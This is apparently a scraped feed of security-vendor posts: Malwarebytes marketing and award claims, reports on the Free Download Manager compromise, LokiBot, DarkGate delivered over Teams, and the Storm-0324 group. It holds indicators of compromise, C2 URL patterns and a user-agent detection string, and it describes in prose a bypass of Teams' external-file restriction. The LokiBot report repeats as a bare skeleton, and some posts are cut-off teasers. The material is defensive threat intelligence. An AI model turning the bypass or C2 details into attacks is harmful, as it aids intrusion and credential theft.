Data breaches may ultimately be out of your control, as you have to hope the organizations holding your personal data have the proper security measures in place to protect your information. However, there are cyber threats you can protect yourself from, and the ways to do so can be rather easy to follow. By keeping […]

The post Apple issues patches to address vulnerabilities; Malware targets Android devices appeared first on BlackCloak | Protect Your Digital Life™.

The post Apple issues patches to address vulnerabilities; Malware targets Android devices appeared first on Security Boulevard.

We released version 1.2 of the Malwarebytes Admin app for iOS and Android last week, adding new Detection features make it easier to see and manage threats.

Designed as a companion to the Nebula console, Malwarebytes Admin allows administrators to quickly review, investigate, and resolve security issues in just a few taps. The latest version of the app features major new additions such as a Detections Screen, a Detections details screen, and dashboard filters.

With this update, customers get a detailed look at malicious activity in their environment so they can quickly spot and take action on infected endpoints. Let’s take a look at the new additions!

Dashboard View

In the dashboard view, scroll down to see the widget for latest Detections by category.

Detections Screen

The Detections Screen feature allows Nebula administrations to see all of the detections in their environment. For each item in detections list, admins can see:

Threat Name
Action Taken Category (Malware, PUP, etc)
Endpoint Name

Administrators are also able to filter detections by Endpoint Name, Threat Name, Action Taken, Category, and more. Filtering by date options, such as Today, Yesterday, Last 7 days, and so on, are also available.

Detections Individual Screen

On the Detections Individual Screen, Nebula administrators can view further details for individual detections by tapping on one of them. Endpoint actions are also available on the Detections Individual Screen.

Detections on Individual Endpoint Screen

Admins are able to navigate from the individual endpoint screen to a list of detections for that endpoint. The same filters from the Detections screen apply here.

Try Malwarebytes Admin today

No more having to make a beeline out of the bathtub to resolve critical alerts. Receive instant notifications on your phone and quickly review, investigate, and resolve issues in just a few taps—now with new Detection features to further streamline threat management.

Download the app for iOS or Android today and experience the convenience of having the power of Nebula right in your pocket.

Malwarebytes Managed Detection and Response (MDR) earned a placed in 12 new reports on G2’s Fall 2023 reports, winning badges for “Easiest to do Business With,” “Best Est. ROI,” “Easiest to Use,” and “Easiest Admin.”

Purpose-built for resource constrained teams, Malwarebytes MDR provides IT staff with high-focus alert monitoring and prioritization with flexible options for remediating threats.

Each quarter, the peer-to-peer review source G2 releases reports highlighting MDR products with the highest customer satisfaction and strongest market presence. Badges are awarded to products that receive the highest overall ratings among certain categories, including the most satisfied customers.

Let’s take a closer look at what real users said about using Malwarebytes MDR.

Easiest to Use, Easiest Admin

Malwarebytes MDR builds on the award-winning user experience of Malwarebytes Endpoint Detection and Response (EDR), enabling customers to seamlessly communicate with Malwarebytes MDR Analysts for recommendation and guidance.

On the Mid-Market Usability Index for Managed Detection and Response (MDR) in Fall 2023, G2 users rated Malwarebytes MDR customers several points above the industry average on the “Ease of Use” and “Ease of Admin” sub-scores.

“Malwarebytes MDR is simple to deploy and manage. They increase our security posture, meet cyber security insurance requirements, and make a great partner to augment my small IT team.”

Steve S.

“Malwarebytes MDR enables us to meet the need for 24×7 coverage with professional security experts who work in the industry every day.”

Matthew Verniere, IT Project Manager

Best Est. ROI

Malwarebytes MDR earned a “Best Estimated ROI” badge on the Mid-Market Results Index for Managed Detection and Response (MDR) in Fall 2023. Based on the survey results, customers with Malwarebytes MDR wait half as long as the industry average to go live and see ROI.

“Cyber threats are 24/7, and my team needs to sleep. The MDR team watching our network around-the-clock gives us a chance to sleep without worry. With Malwarebytes MDR backing us up, I also finally got to step away and take a two-week vacation. I’m just glad to know that we have a security team watching over our shoulders and making sure it’s all clear.”

Dennis Davis, IT Systems Manager

Experience Malwarebytes MDR: Award-winning ROI, user-friendly, and effective threat defense

Malwarebytes MDR provides IT staff with award-winning business protection, offering 24×7 alert monitoring and guidance, active remediation, and threat hunting across endpoints.

Try Malwarebytes MDR today and join the ranks of those who have already discovered the amazing results, support, and ROI of our exceptional managed service solutions: https://try.malwarebytes.com/mdr-consultation-new/

Get a Malwarebytes MDR quote

Read front-line stories about how Malwarebytes MDR analysts do threat hunting on customer networks:

Tracking down a trojan: An inside look at threat hunting in a corporate network

Understanding ransomware reinfection: An MDR case study

Additional reading:

How to choose an MDR vendor: 6 questions to ask

Is an outsourced SOC worth it? Looking at the ROI of MDR

3 ways MDR can drive business growth for MSPs

Cyber threat hunting for SMBs: How MDR can help

An authentic-looking page and an almost genuine URL can be enough to entice users to download malicious software.

An issue was discovered in ImfHpRegFilter.sys in IOBit Malware Fighter version 8.0.2, allows local attackers to cause a denial of service (DoS).

Highlights: Check Point Research (CPR) recently discovered an active campaign deploying a new variant of the BBTok banking malware in Latin America Originally exposed in 2020, the newly discovered variant of the malware replicates the interfaces of over 40 Mexican and Brazilian banks, and tricks the infected victims into entering their 2FA code to their bank accounts or into entering their payment card number Over the time, the cybercriminals behind the malware are actively maintaining diversified infection chains for different versions of Windows. Those chains employ a wide variety of file types, including ISO, ZIP, LNK, DOCX, JS and XLL […]

The post Check Point Research exposes new versions of the BBTok banking malware, which targets clients of over 40 Mexican and Brazilian banks appeared first on Check Point Blog.

In a public announcement, Free Download Manager has acknowledged that a specific web page on its site was compromised by a Ukrainian cybercrime group, exploiting it to distribute malware.

Free Download Manager is—unsurprisingly—a download manager for Windows, macOS, Android, and Linux that allows users to manage their downloads and lets them grab large files, torrents, music, and videos.

In the announcement the service says the actual security incident took place in 2020. So why was the issue only recently discovered?

First and foremost, the cybercriminals only redirected users that aimed for the Linux version of the software.

Not all of these visitors were redirected to the malicious domain. They were “fingerprinted” based on as yet unknown criteria and only some were served the malicious Debian package. According to Free Download Manager the compromised website contained an exception list of IP addresses from various subnets, including those associated with Bing and Google. Visitors from these IP addresses were always given the correct download link.

Furthermore, the victims received a full functional Free Download Manger, so they had no reason to assume that something was amiss, even though some users reported errors that said “Waiting for process: crond” when they tried to shut down or reboot their system.

According to the statement made by Free Download Manager:

“It’s estimated that much less than 0.1% of our visitors might have encountered this issue.”

The number of victims might even have been less, if it weren’t for the fact that several posts on social media, Reddit, StackOverflow, YouTube, and Unix Stack Exchange, pointed to the malicious domain as a reliable source for getting the Free Download Manager tool.

Unfortunately, malware scanners for Linux are considered useless by many home users, and only some companies add them to their endpoint security solution. So, there is not much overlap to be expected between the users of Free Download Manager and those that have deployed an anti-malware solution for Linux systems.

Debian packages are typically used to install software on Debian-based Linux distributions, including Ubuntu. The malicious package dropped an information-stealing script and a crond backdoor that established a reverse shell from the C2 server. Crond is a daemon used to execute cron jobs in the background. It is a service process that handles and executes commands to run automated tasks (cron jobs) in accordance with a specified schedule.

The stealer in question was after system information, browsing history, saved passwords, cryptocurrency wallet files, as well as credentials for cloud services (AWS, Google Cloud, Oracle Cloud Infrastructure, Azure).

Remediation

The compromised Free Download Manager website has been replaced. All the Free Download Manager users who downloaded FDM for Linux between 2020 and 2022 should scan their computers for malware.

Malwarebytes Browser Guard users will receive a warning when they try to visit this domain.

Browser Guard blocks fdmpkg.org

Indicators of Compromise (IOCs):

File hashes (SHA-256):

b77f63f14d0b2bde3f4f62f4323aad87194da11d71c117a487e18ff3f2cd468d

2214c7a0256f07ce7b7aab8f61ef9cbaff10a456c8b9f2a97d8f713abd660349

93358bfb6ee0caced889e94cd82f6f417965087203ca9a5fce8dc7f6e1b8a3ea

d73be6e13732d365412d71791e5eb1096c7bb13d6f7fd533d8c04392ca0b69b5

File locations:

/etc/cron.d/collect

/var/tmp/crond

/var/tmp/bs

/var/tmp/atd

IP and domain:

172.111.48.101

fdmpkg.org

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

The AI race is on! It’s easy to lose track of the latest developments and possibilities, and yet everyone wants to see firsthand what the hype is about. Heydays for cybercriminals!

The peer-to-peer review source G2 has released their Fall 2023 reports, ranking Malwarebytes as a leader across a number of endpoint protection categories. In the most recent results, Malwarebytes is the only vendor to earn the “Easiest to Use” and “Easiest Admin” recognition for its Endpoint Detection and Response (EDR) and Managed Detection and Response (MDR).

Based on verified customer reviews, Malwarebytes has been ranked #1 over top EDR vendors for endpoint malware and antivirus protection, detection and remediation of web-based threats, product usability, and more. These results continue Malwarebytes’ top ranking by G2, reinforcing Malwarebytes’ leadership in the endpoint security platform market.

Badges are awarded to products that receive the highest overall ratings among certain categories including most satisfied customers. For example, the Best Usability badge goes to the single product with the highest overall usability score. Also of note is G2’s “Grid” reports, which represent which vendors have the most satisfied customers, largest presence in the market, and other factors.

How did Malwarebytes perform in G2 Fall 2023?

Malwarebytes EDR is a Leader in the “EDR Grid” overall, and for mid-market.

Real-users ranked Malwarebytes as the most usable EDR solution (#1 in the Mid-market usability Grid)
Badges: Easiest to Use, Best Usability, Easiest Admin

In the Endpoint Protection Suites category, Malwarebytes is a Leader in overall and mid-market Grid reports.

#1 overall Usability index, underscoring Malwarebytes’ commitment to building effective solutions that are easy to deploy, use, and manage
Badges: Most Implementable, Easiest Setup, Best Results, Easiest to Use, Easiest Admin, Best Usability

In the Managed Detection and Response (MDR) category:

The Malwarebytes MDR solution provides 24×7 threat monitoring and investigations without the expense of building and running a SOC in-house.

Real users awarded Malwarebytes MDR with the Best ROI, Easiest to Use, and Easiest Admin badges

EDR that’s Easy to Use

Feedback from real users placed Malwarebytes EDR as the most user-friendly EDR solution available in the Mid-market Usability Index, with a Usability Score that surpasses the average across all vendors by almost 10 percent.

“If you are purchasing Malwarebytes, then you have made the correct choice. You will quickly see how easy it is to implement, and how great their support is.”

Mauro B.

“Very easy to install and deploy, setup, and configure – for instance – a 5 machine setup would take roughly ~10 mins from start to finish.”

Verified User

“Easy to use and implement, along with great support and support tools at your disposal, along with courses to help you become more familiar with the inner workings.”

Doug C.

#1 Endpoint Protection that’s Easy to Use and Effective

Malwarebytes Endpoint Protection proudly holds the #1 spot in the overall Usability index. Our Ease of Use, Ease of Admin, and Meets Requirements subscores for this category outpace the industry average by multiple percentage points.

“The Nebula console is one of the most user-friendly interfaces we’ve come across. We can’t recommend it enough.”

Justin N.

“Malwarebytes makes it simple to deploy. Additionally, the user interface has minimal impact on the end-user, so its win-win. Support are happy to help when you do hit the occasional bump and the portal is easy to use and very responsive.”

John K.

MDR with the Best ROI

Malwarebytes MDR placed on 12 reports for G2 Fall 2023 reports, winning badges for “Easiest to do Business With”, “Best Est. ROI” , “Easiest to Use”, and “Easiest Admin”.

“Malwarebytes MDR is simple to deploy and manage. They increase our security posture, meet cyber security insurance requirements, and make a great partner to augment my small IT team.”

Steve S.

“We wanted to extend our SOC team with MDR services, and that has always been our vision with Malwarebytes since we look at the company as a partner, rather than a vendor. Malwarebytes MDR enables us to meet the need for 24 x7 coverage with professional security experts who work in the industry every day.”

Matthew Verniere, Richards Building Supply

Dennis Davis, IT Systems Manager, Drummond

Experience Malwarebytes for Business: Award-winning ROI, user-friendly, and effective threat defense

Malwarebytes provides IT staff with award-winning business solutions, offering unmatched threat protection, a lightning-fast return on investment, and a smooth, speedy implementation.

Try Malwarebytes EDR today and join the ranks of those who have already discovered the amazing results, support, ROI, and more of our exceptional endpoint security solutions.

Malwarebytes EDR and MDR are recognized as leaders in endpoint security by real, reputable customers. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

MRG Effitas, a world leader in independent IT research, published their anti-malware efficacy assessment results for Q2 2023. Malwarebytes Endpoint Protection (EP) achieved the highest possible score (100%) and received certifications for Level 1, Exploit, Online Banking, and Ransomware.

These results mark the eighth time in a row we have received all certification awards, and we are now officially the only vendor to win every single certification & award in 2022 and so far into 2023.

MRG Effitas assesses a product’s ability to meet today’s most pressing threats, including stopping zero-day malware, ransomware, exploits, and more—and doing so with speedy performance and low false positives.

In addition to their normal tests, for Q2 2023 MRG Effitas added two new tests to their Q2 2023 360° Assessment & Certification: the ITW Phishing Test and Phishing Simulator Test.

Malwarebytes blocked 100% of phishing attempts in BOTH the ITW Phishing Test and Phishing Simulator Test. In other words, Malwarebytes was the only vendor in the Q2 2023 MRG test to both receive all 4 award logos AND block 100% of phishing attempts.

How we were able to do it: The signature and behavior-based detection techniques and proprietary anti-exploit technology of Malwarebytes EP allowed it to detect and block more malware than any other competitor on the Q2 test. In addition, the Web protection layer of our EP blocks access to and from known or suspicious Internet addresses, allowing us to ace the phishing tests.

As an integral foundation layer for our EDR and MDR solutions, these results prove that Malwarebytes EP provides reliable and comprehensive protection against a wide range of threats.

For the full results and to see how we stack up against competitors, our “Endpoint Security Evaluation Guide” eBook—based on MRG Effitas’ independent lab assessment—is an essential tool for any organization looking to make an informed decision about endpoint security. Download below!

GET THE ENDPOINT SECURITY EVALUATION GUIDE

Let’s dive into where we prevented more than the rest and how we were able to do it.

100% of phishing attempts blocked

Given the frequency and risks associated with phishing attacks today, it’s clear that modern endpoint security needs to protect against these attacks.

According to Verizon, attackers used phishing for initial access in 15% of data breaches in 2022. CISA also showed that, within the first 10 minutes of receiving a phishing email, 84% of employees took the bait. After successfully compromising a system through phishing, threat actors can further their attacks by dropping ransomware or stealing sensitive data, leading to costly financial and reputational damages.

Malwarebytes blocked 100% of phishing attempts in BOTH the ITW Phishing Test and Phishing Simulator Test.

How we were able to do it: Malwarebytes EP, the foundation for Malwarebytes EDR, features a Web protection layer that blocks access to and from known or suspicious Internet addresses.

100% of ransomware blocked

Using a blend of signature and signature-less technologies, the anti-ransomware layer of Malwarebytes EP constantly monitors endpoint systems and automatically kills processes associated with ransomware activity.

MRG Effitas tested security products for 30 ransomware samples. In addition, they tested four ransomware simulator samples created in-house, ensuring the security product could only rely on its behavior scanning modules. To test for false positives, a device running Malwarebytes EP also ran three benign programs designed to mimic ransomware behavior.

Malwarebytes blocked 100 percent of ransomware threats in the MRG Effitas assessment and did so with no false positives, allowing the three benign programs to run. For this we earned the 360° Ransomware Certification.

Nebula view of detected ransomware activity

100% of banking malware blocked

In 2021, 37% of banking malware attacks targeted corporate users.

We were one of the few vendors who earned a 360° Online Banking Certification, which means Malwarebytes EP stopped 100% of threats designed to steal financial information and money from victim’s accounts. To outperform the others, our unique detection technology again came into play.

Malwarebytes EP autoblocked 100% of the 25 financial malware samples, the Magecart credit card-skimming attack, and Botnets designed to steal credentials.

100% of zero-day threats blocked

One of the many strong suits of our detection is that it can detect malware that has never been seen before, also called zero-day malware. Again, we were one of the only vendors to detect and block these pernicious threats, which account for 80% of successful breaches.

Built on machine learning (ML) and behavioral analysis techniques, our behavior-based detection enabled Malwarebytes EP to detect and autoblock 100% of all zero-day threats. For this, as well as blocking all Botnets, we earned the 360° Level 1 Certification.

100% of exploits blocked

The anti-exploit feature of Malwarebytes EP protects organizations from one of the most advanced cyber attacks: zero-day exploits targeting browser and application vulnerabilities.

But don’t take our word for it: MRG Effitas used 8 different exploitation techniques to try and deliver a malicious payload on a device running Malwarebytes EP—but they didn’t get very far. Malwarebytes earned the 360° Exploit Certification for autoblocked 100% of Exploit/Fileless attacks, entirely protecting the system from infection.

We were one of the few to earn the 360° Exploit Certification all thanks to our proprietary anti-exploit technology, which wraps vulnerable programs in four defensive layers that prevent an exploit from installing its payload, or even executing initial shellcode.

Our four layers of exploit protection

Anti-exploit settings in Nebula

Consistency is key

If there is one shining take away from this accomplishment, it’s that consistency is key.

You don’t want a security solution that passes rigorous tests like MRG Effitas only some of the time. You want a solution that passes them with flying colors all of the time. Clearly, Malwarebytes EP, and by extension our EDR and MDR, is that solution.

For organizations that are concerned their current solution may not be up-to-par, the MRG Effitas assessment has demonstrated that Malwarebytes for Business —more constantly than anybody else—has what it takes to keep your business safe from today’s most pressing cyberthreats.

GET THE FULL RESULTS HERE

By Madalynn Carr

Report date: 09/07/2023

LokiBot is an Information Stealer with expanding capabilities depending on the threat actor. This malware family was originally written in C++ and targets Windows devices. LokiBot was first advertised in 2015 on underground markets in Eastern Europe, however it was not common to see it in the wild until 2018. Since then, LokiBot has remained in the top five malware families delivered through phishing emails.

History

LokiBot first surfaced in March of 2015 on underground hacking forums by a hacker with an alias of “lokistov”, who is also known as “Carter”. This can be seen in Figure 1, where LokiBot was originally posted on an underground form. LokiBot was originally advertised as a “Resident Loader and Password and CryptoCoin-wallet stealer.” It is assumed that lokistov is from a non-English speaking country, specifically an ex-USSR country. LokiBot was being sold for upwards of $450 USD or $540 USD in the current economy this report was written, depending on whether the buyer wanted the stealer or the loader, as well as other add-ons such as a change in the C2 (Command and Control) IP address. After release, every week lokistov would publish an update until 2017, when lokistov released LokiBot V2. Since then, they have not updated the forums for LokiBot V1. Shortly after, the LokiBot source code was leaked around 2018 and is now being sold on forums for as low as $80 USD. There are two theories of how this happened. One is that somebody reversed the original LokiBot and gathered the source code, then published the cracked version of the malware. The other theory is that lokistov got hacked themselves, and the hacker published the stolen version.

Figure 1: Original Posting of LokiBot by Lokistov.

LokiBot became a popular malware choice for threat actors due to the low price and ease of use. Since then, lokistov has released LokiBot 2.0 and is currently selling it on underground forums. This newer version of the Information Stealer includes more evasive techniques and expands further into Keylogger, Remote Access Trojan (RAT), and even ransomware attributes.

Notable Uses

Due to LokiBot being around for a while, there have been a sizeable number of media pieces revolving around LokiBot, however none of them revolve around the campaigns that APT (Advanced Persistence Threat) groups are using this malware to conduct. The most recent use was in February of 2020, where LokiBot impersonated a Fortnite launcher, which was one of the most popular video games at the time.

Since LokiBot is simple, adaptable and easily accessible, this malware has remained in the top 5 malware families seen at Cofense since 2019. During 2019 and 2020, LokiBot was a high competitor for the top malware family seen, constantly switching places with the ever-popular Agent Tesla.

Capabilities

Although LokiBot originated as an Information Stealer, it has been cracked and edited several times. LokiBot can have RAT or keylogger capabilities. However, the majority of LokiBot seen in the wild only demonstrates Information Stealer capabilities. LokiBot is capable of stealing credentials from over 100 different clients, including but not limited to:

Email Clients FTP Clients VNC Clients HTTP Browsers Password Managers IM Clients

Specific examples of what these applications are can be found in Table 1, however the list is not limited to just these specific applications.

Mozilla Firefox

Internet Explorer

Google Chrome

K-Meleon

Comodo Dragon

SeaMonkey

Safari

CoolNovo

Opera

Chromium

Titan Browser

Yandex Browser

Superbird Browser

Chrome Canary

Waterfox

Flash FXP

Nexus File

JaSFtp

Syncovery

Remmia RDP

FileZila

CyberDuck

NovaFTP

FTPShell

NETFile

mSecure Wallet

Fling

KiTTY

PuTTY

WinSCP

Outlook

Mozilla Thunderbird

Pocomail

Gmail Notifier Pro

yMail

Pidgin

AI RoboForm

KeePass

EnPass

1Password

Table 1: List of examples that LokiBot has the capability to steal from.

In the Wild

LokiBot has always been seen at Cofense as one of the most popular malware families used by threat actors. Due to its simplistic nature and usage, low-skill threat actors can use LokiBot for a variety of malicious purposes. In 2019 up until around 2021, LokiBot would often be the most common malware family, followed by Agent Tesla Keylogger. At the time of this report, other malware families have appeared more often, and therefore pushed LokiBot down in the rankings. However, LokiBot is still in the top five malware families seen at Cofense. Figure 2 shows the percentage of LokiBot malware seen among other malware families in our Active Threat Reports (ATR), and although there was a small dip over the past year and a half, LokiBot has remained around eight percent of all malware seen each month.

Figure 2: Loki Bot’s relative value seen at Cofense between January 2022 and July 2023.

Delivery Mechanisms

LokiBot is often seen by itself when it is delivered via email, however, as can be seen in Figure 2, there is still quite a large amount of LokiBot that is accompanied by a delivery mechanism. Out of the delivery mechanisms seen by Cofense, an overwhelming 82% of LokiBot accompanied by a delivery mechanism is delivered by CVE-2017-11882. However, out of all the LokiBot samples seen by Cofense, over half of the LokiBots are seen delivered as a direct attachment.

Figure 3: Delivery Mechanisms used to deliver Loki Bot between January 2022 and July 2023.

Very rarely will LokiBot be delivered via embedded URLs or other forms of delivery mechanisms except for CVE-2017-11882, such as Visual Basic Scripts (VBS) or Windows Shortcut File (LNK), as just over one percent of LokiBot samples were seen to be delivered via both delivery mechanisms combined between January 2022 to July 2023.

Behavior

LokiBot has a very straightforward and simplistic way of behaving. Once LokiBot has been downloaded and run, LokiBot will unpack itself onto the system. From there, this malware will start collecting sensitive information from each of the programs it supports gathering information from. Once LokiBot has exhausted all the possible applications that can give the sensitive data, as well as any extra additions such as keystroke logging, it will create a customized HTTP packet and send it to the C2, as seen in Figure 4. As LokiBot is gathering the information into an HTTP packet, some versions of LokiBot will start to maintain persistence, while others may continue to run and occasionally connect in case any new credentials are stored on the machine.

Figure 4: Example of an HTTP POST request from a computer infected with LokiBot.

This specific link is the final destination, where the information is presented to the threat actor. If one were to visit the page, they would be greeted with a captcha as well as a login page as seen in Figure 5.

Figure 5: Example of a LokiBot C2 Authentication Panel.

Detection and Hunting

LokiBot heavily depends on connecting to its C2, and therefore makes detection generally easy to spot. Due to the low volume of embedded URLs delivering LokiBot, the primary way to prevent LokiBot from being installed on a system is to not allow unknown downloads from suspicious emails. Most anti-virus software is good at catching LokiBot due to its simplicity, but there are also other ways to spot if LokiBot is already installed on a system.

User Agent

LokiBot can also be identified by a specific string found in the application as well as the network traffic. LokiBot will always use the User Agent “Mozilla/4.08 (Charon; Inferno)” to connect to its C2s, as seen in Figure 4.

Network Traffic

As previously mentioned, LokiBot will use the User Agent “Mozilla/4.08 (Charon; Inferno)” to post the credentials to its C2 Panel. LokiBot primarily only uses HTTP to communicate to its C2. There are a variety of ways the URL can be formatted, but the file that the link is accessing is typically followed by a PHP panel or ends with a “p=” followed by a unique set of numbers to differentiate the systems that LokiBot has infected. An example of this that Cofense has previously reported is:“hxxp216[.]128[.]145[.]196/~wellseconds/?p=”A more common example is the other IOC mentioned, which is the PHP panel whose URL looks similar to:“hxxp194[.]55[.]224[.]9/fresh1/five/fre[.]php”.

fre.php

gate.php

aaaj.php

nimda.php

ight.php

crkk.php

free.php

wish.php

base.php

fred.php

mono.php

mime.php

Table 3: Examples of PHP Panels that have been seen as a C2 for Loki Bot.

The examples listed in Table 3 are not an exhaustive list of all panel PHPs as LokiBot can change the name of the PHP panel. However, the majority of LokiBot will use “fre.php” when connecting to its host.

The post LokiBot – Phishing Malware Baseline appeared first on Cofense.

By Madalynn Carr

Report date: 09/07/2023

History

Figure 1: Original Posting of LokiBot by Lokistov.

Notable Uses

Capabilities

Email Clients FTP Clients VNC Clients HTTP Browsers Password Managers IM Clients

Specific examples of what these applications are can be found in Table 1, however the list is not limited to just these specific applications.

Mozilla Firefox

Internet Explorer

Google Chrome

K-Meleon

Comodo Dragon

SeaMonkey

Safari

CoolNovo

Opera

Chromium

Titan Browser

Yandex Browser

Superbird Browser

Chrome Canary

Waterfox

Flash FXP

Nexus File

JaSFtp

Syncovery

Remmia RDP

FileZila

CyberDuck

NovaFTP

FTPShell

NETFile

mSecure Wallet

Fling

KiTTY

PuTTY

WinSCP

Outlook

Mozilla Thunderbird

Pocomail

Gmail Notifier Pro

yMail

Pidgin

AI RoboForm

KeePass

EnPass

1Password

Table 1: List of examples that LokiBot has the capability to steal from.

In the Wild

Figure 2: Loki Bot’s relative value seen at Cofense between January 2022 and July 2023.

Delivery Mechanisms

Figure 3: Delivery Mechanisms used to deliver Loki Bot between January 2022 and July 2023.

Behavior

Figure 4: Example of an HTTP POST request from a computer infected with LokiBot.

Figure 5: Example of a LokiBot C2 Authentication Panel.

Detection and Hunting

User Agent

Network Traffic

fre.php

gate.php

aaaj.php

nimda.php

ight.php

crkk.php

free.php

wish.php

base.php

fred.php

mono.php

mime.php

Table 3: Examples of PHP Panels that have been seen as a C2 for Loki Bot.

The post LokiBot – Phishing Malware Baseline appeared first on Cofense.

Researchers have found a new method by which cybercriminals are spreading the DarkGate Loader malware. Until now, DarkGate was typically distributed via phishing emails. The malspam campaign used stolen email threads to lure victims into clicking a hyperlink, which downloaded the malware. But Malwarebytes also found DarkGate reloaded via malvertising and SEO poisoning campaigns.

A cybercriminal who goes by the handle RastaFarEye has been advertising DarkGate Loader on cybercrime forums since June 16, 2023. Once active, the malware can be used for several malicious activities like remote access, cryptocurrency mining, keylogging, clipboard stealing, and information stealing.

What’s new is that the researchers found evidence of a campaign using Microsoft Teams to deliver the DarkGate Loader.

“On August 29, in the timespan from 11:25 to 12:25 UTC, Microsoft Teams chat messages were sent from two external Office 365 accounts compromised prior to the campaign. The message content aimed to social engineer the recipients into downloading and opening a malicious file hosted remotely.”

The distributed link initially points to a traffic distribution system (TDS). If the requirements set by the attacker are met, the TDS will redirect the victim user to the final payload URL for the MSI download. When the user opens the downloaded MSI file, the DarkGate infection is triggered.

The download locations observed in the Teams attacks were sharepoint.com URLs hosting .zip files with names like “Changes to the vacation schedule.zip.” The ZIP file contains a malicious LNK file (shortcut) posing as a PDF document: “Changes to the vacation schedule.pdf.lnk.”

Clicking the shortcut executes a command line which triggers the download and execution of a renamed cURL (a command-line tool for getting or sending data including files using URL syntax) to download and execute Autoit3.exe and a bundled script. The pre-compiled AutoIT script hides the code in the middle of the file and, on execution, drops a new file that contains shellcode.

When the shellcode is run, the first thing it uses is the “byte by byte” technique aka called stacked strings, to create a new file: a Windows executable identified as DarkGate Loader.

Protection

Current Microsoft Teams security features such as Safe Attachments or Safe Links failed to detect or block this attack. BleepingComputer reported in June of 2023 that security researchers had found a simple way to deliver malware to an organization with Microsoft Teams, despite restrictions in the application for files from external sources. Microsoft Teams has client-side protections in place to block file delivery from external tenant accounts. But the restriction can be circumvented by changing the internal and external recipient ID in the POST request of a message, which ends up with Teams treating an external user as if it was an internal one.

The only way to prevent this attack vector within Microsoft Teams is to only allow Microsoft Teams chat requests from specific external domains. This may be troublesome in some environments since this means that all trusted external domains need to be whitelisted by an IT administrator.

Malwarebytes customers are protected against this attack as Malwarebytes blocks the C2 server hosting the downloaded files. Malwarebytes detects the LNK file and the scripts as Trojan.DarkGate.

Malwarebytes blocks 5.188.87.58

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

The threat actor that Microsoft tracks as Storm-0324 is a financially motivated group known to gain initial access using email-based initial infection vectors and then hand off access to compromised networks to other threat actors. These handoffs frequently lead to ransomware deployment. Beginning in July 2023, Storm-0324 was observed distributing payloads using an open-source tool to send phishing lures through Microsoft Teams chats. This activity is not related to the Midnight Blizzard social engineering campaigns over Teams that we observed beginning in May 2023. Because Storm-0324 hands off access to other threat actors, identifying and remediating Storm-0324 activity can prevent more dangerous follow-on attacks like ransomware.

Storm-0324 (DEV-0324), which overlaps with threat groups tracked by other researchers as TA543 and Sagrid, acts as a distributor in the cybercriminal economy, providing a service to distribute the payloads of other attackers through phishing and exploit kit vectors. Storm-0324’s tactics focus on highly evasive infection chains with payment and invoice lures. The actor is known to distribute the JSSLoader malware, which facilitates access for the ransomware-as-a-service (RaaS) actor Sangria Tempest (ELBRUS, Carbon Spider, FIN7). Previous distribution activity associated with Storm-0324 included the Gozi infostealer and the Nymaim downloader and locker.

In this blog, we provide a comprehensive analysis of Storm-0324 activity, covering their established tools, tactics, and procedures (TTPs) as observed in past campaigns as well as their more recent attacks. To defend against this threat actor, Microsoft customers can use Microsoft 365 Defender to detect Storm-0324 activity and significantly limit the impact of these attacks on networks. Additionally, by using the principle of least privilege, building credential hygiene, and following the other recommendations we provide in this blog, administrators can limit the destructive impact of ransomware even if the attackers can gain initial access.

Historical malware distribution activity

Storm-0324 manages a malware distribution chain and has used exploit kit and email-based vectors to deliver malware payloads. The actor’s email chains are highly evasive, making use of traffic distribution systems (TDS) like BlackTDS and Keitaro, which provide identification and filtering capabilities to tailor user traffic. This filtering capability allows attackers to evade detection by certain IP ranges that might be security solutions, like malware sandboxes, while also successfully redirecting victims to their malicious download site.

Storm-0324’s email themes typically reference invoices and payments, mimicking services such as DocuSign, Quickbooks, and others. Users are ultimately redirected to a SharePoint-hosted compressed file containing JavaScript that downloads the malicious DLL payload. Storm-0324 has used many file formats to launch the malicious JavaScript including Microsoft Office documents, Windows Script File (WSF), and VBScript, among others.

Storm-0324 has distributed a range of first-stage payloads since at least 2016, including:

Nymaim, a first-stage downloader and locker

Gozi version 3, an infostealer

Trickbot, a modular malware platform

Gootkit, a banking trojan

Dridex, a banking trojan

Sage ransomware

GandCrab ransomware

IcedID, a modular information-stealing malware

Since 2019, however, Storm-0324 has primarily distributed JSSLoader, handing off access to ransomware actor Sangria Tempest.

Ongoing Storm-0324 and Sangria Tempest JSSLoader email-based infection chain

Diagram showing the Storm-0324 attack chain from the delivery of phishing email to the deployment of the JSSLoader DLL, after which access is handed off to Sangria Tempest Figure 1. Storm-0324 JSSLoader infection chain based on mid-2023 activity

Since as early as 2019, Storm-0324 has handed off access to the cybercrime group Sangria Tempest after delivering the group’s first-stage malware payload, JSSLoader. Storm-0324’s delivery chain begins with phishing emails referencing invoices or payments and containing a link to a SharePoint site that hosts a ZIP archive. Microsoft continues to work across its platforms to identify abuse, take down malicious activity, and implement new proactive protections to discourage malicious actors from using our services.

Screenshot of invoice-themed lure email Figure 2. Example Storm-0324 email

The ZIP archive contains a file with embedded JavaScript code. Storm-0324 has used a variety of files to host the JavaScript code, including WSF and Ekipa publisher files exploiting the CVE-2023-21715 local security feature bypass vulnerability.

When the JavaScript launches, it drops a JSSLoader variant DLL. The JSSLoader malware is then followed by additional Sangria Tempest tooling.

In some cases, Storm-0324 uses protected documents for additional social engineering. By adding the security code or password in the initial communications to the user, the lure document may acquire an additional level of believability for the user. The password also serves as an effective anti-analysis measure because it requires user interaction after launch.

Screenshot of Storm-0324 password protected lure document Figure 3. Storm-0324 password-protected lure document

New Teams-based phishing activity

In July 2023, Storm-0324 began using phishing lures sent over Teams with malicious links leading to a malicious SharePoint-hosted file. For this activity, Storm-0324 most likely relies on a publicly available tool called TeamsPhisher. TeamsPhisher is a Python-language program that enables Teams tenant users to attach files to messages sent to external tenants, which can be abused by attackers to deliver phishing attachments. These Teams-based phishing lures by threat actors are identified by the Teams platform as “EXTERNAL” users if external access is enabled in the organization.

